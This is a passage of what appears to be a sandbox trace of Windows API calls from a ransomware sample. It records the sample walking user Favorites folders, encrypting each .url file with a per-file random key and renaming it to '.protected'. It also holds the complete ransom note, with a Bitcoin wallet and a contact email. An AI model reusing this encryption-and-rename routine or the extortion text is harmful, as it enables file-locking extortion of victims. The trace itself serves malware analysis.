lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.853] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x86, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x86, lpOverlapped=0x0) returned 1 [0091.854] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.854] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.854] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.854] CloseHandle (hObject=0xd4) returned 1 [0091.855] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.protected") returned 92 [0091.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft Store.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft store.url.protected")) returned 1 [0091.856] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.856] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.856] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\RESTORE_FILES.txt") returned 80 [0091.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.857] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.857] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.858] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.858] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.858] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.858] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.858] CloseHandle (hObject=0xb4) returned 1 [0091.859] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.859] lstrcmpiW (lpString1="MSN Websites", lpString2="Windows") returned -1 [0091.859] lstrcmpiW (lpString1="MSN Websites", lpString2="Program Files") returned -1 [0091.860] lstrcmpiW (lpString1="MSN Websites", lpString2="Program Files (x86)") returned -1 [0091.860] lstrcmpiW (lpString1="MSN Websites", lpString2="$Recycle.bin") returned 1 [0091.860] lstrcmpiW (lpString1="MSN Websites", lpString2="System Volume Information") returned -1 [0091.860] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites") returned 56 [0091.860] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0091.860] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0091.860] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*") returned 58 [0091.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0091.863] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0091.863] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0091.863] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0091.863] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0091.863] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0091.863] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\.") returned 58 [0091.863] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0091.863] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.863] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0091.863] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0091.863] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0091.863] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0091.863] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0091.863] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\..") returned 59 [0091.863] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0091.863] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0091.863] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.863] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Windows") returned -1 [0091.863] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Program Files") returned -1 [0091.863] lstrcmpiW (lpString1="MSN Autos.url", lpString2="Program Files (x86)") returned -1 [0091.863] lstrcmpiW (lpString1="MSN Autos.url", lpString2="$Recycle.bin") returned 1 [0091.863] lstrcmpiW (lpString1="MSN Autos.url", lpString2="System Volume Information") returned -1 [0091.863] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0091.863] StrStrIW (lpFirst="MSN Autos.url", lpSrch=".protected") returned 0x0 [0091.863] lstrcmpW (lpString1="MSN Autos.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.863] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.864] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0091.864] StrStrW (lpFirst="MSN Autos.url", lpSrch=".txt") returned 0x0 [0091.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0091.864] StrStrW (lpFirst="MSN Autos.url", lpSrch=".rar") returned 0x0 [0091.865] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url") returned 70 [0091.865] StrStrW (lpFirst="MSN Autos.url", lpSrch=".zip") returned 0x0 [0091.865] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.865] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.866] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.866] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.866] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.866] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.866] CloseHandle (hObject=0xd4) returned 1 [0091.867] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.protected") returned 80 [0091.867] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Autos.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn autos.url.protected")) returned 1 [0091.868] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.868] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Windows") returned -1 [0091.868] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Program Files") returned -1 [0091.868] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="Program Files (x86)") returned -1 [0091.868] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="$Recycle.bin") returned 1 [0091.868] lstrcmpiW (lpString1="MSN Entertainment.url", lpString2="System Volume Information") returned -1 [0091.868] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0091.868] StrStrIW (lpFirst="MSN Entertainment.url", lpSrch=".protected") returned 0x0 [0091.868] lstrcmpW (lpString1="MSN Entertainment.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.868] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.868] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0091.927] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".txt") returned 0x0 [0091.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0091.927] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".rar") returned 0x0 [0091.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url") returned 78 [0091.927] StrStrW (lpFirst="MSN Entertainment.url", lpSrch=".zip") returned 0x0 [0091.927] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.927] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.927] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.928] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.928] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.928] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.928] CloseHandle (hObject=0xd4) returned 1 [0091.929] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.protected") returned 88 [0091.929] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.protected")) returned 1 [0091.930] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.930] lstrcmpiW (lpString1="MSN Money.url", lpString2="Windows") returned -1 [0091.930] lstrcmpiW (lpString1="MSN Money.url", lpString2="Program Files") returned -1 [0091.930] lstrcmpiW (lpString1="MSN Money.url", lpString2="Program Files (x86)") returned -1 [0091.930] lstrcmpiW (lpString1="MSN Money.url", lpString2="$Recycle.bin") returned 1 [0091.930] lstrcmpiW (lpString1="MSN Money.url", lpString2="System Volume Information") returned -1 [0091.930] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0091.930] StrStrIW (lpFirst="MSN Money.url", lpSrch=".protected") returned 0x0 [0091.931] lstrcmpW (lpString1="MSN Money.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.931] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.931] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0091.932] StrStrW (lpFirst="MSN Money.url", lpSrch=".txt") returned 0x0 [0091.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0091.932] StrStrW (lpFirst="MSN Money.url", lpSrch=".rar") returned 0x0 [0091.932] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned 70 [0091.932] StrStrW (lpFirst="MSN Money.url", lpSrch=".zip") returned 0x0 [0091.932] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.933] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.933] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.934] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.934] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.934] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.934] CloseHandle (hObject=0xd4) returned 1 [0091.935] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.protected") returned 80 [0091.935] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.protected")) returned 1 [0091.936] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.936] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Windows") returned -1 [0091.936] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Program Files") returned -1 [0091.936] lstrcmpiW (lpString1="MSN Sports.url", lpString2="Program Files (x86)") returned -1 [0091.936] lstrcmpiW (lpString1="MSN Sports.url", lpString2="$Recycle.bin") returned 1 [0091.936] lstrcmpiW (lpString1="MSN Sports.url", lpString2="System Volume Information") returned -1 [0091.936] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0091.936] StrStrIW (lpFirst="MSN Sports.url", lpSrch=".protected") returned 0x0 [0091.936] lstrcmpW (lpString1="MSN Sports.url", lpString2="RESTORE_FILES.txt") returned -1 [0091.936] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.936] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0091.941] StrStrW (lpFirst="MSN Sports.url", lpSrch=".txt") returned 0x0 [0091.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0091.941] StrStrW (lpFirst="MSN Sports.url", lpSrch=".rar") returned 0x0 [0091.941] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned 71 [0091.941] StrStrW (lpFirst="MSN Sports.url", lpSrch=".zip") returned 0x0 [0091.942] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.942] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffff7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.942] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x85, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x85, lpOverlapped=0x0) returned 1 [0091.943] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.943] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.943] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.944] CloseHandle (hObject=0xd4) returned 1 [0091.944] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.protected") returned 81 [0091.944] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url.protected")) returned 1 [0091.945] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.945] lstrcmpiW (lpString1="MSN.url", lpString2="Windows") returned -1 [0091.945] lstrcmpiW 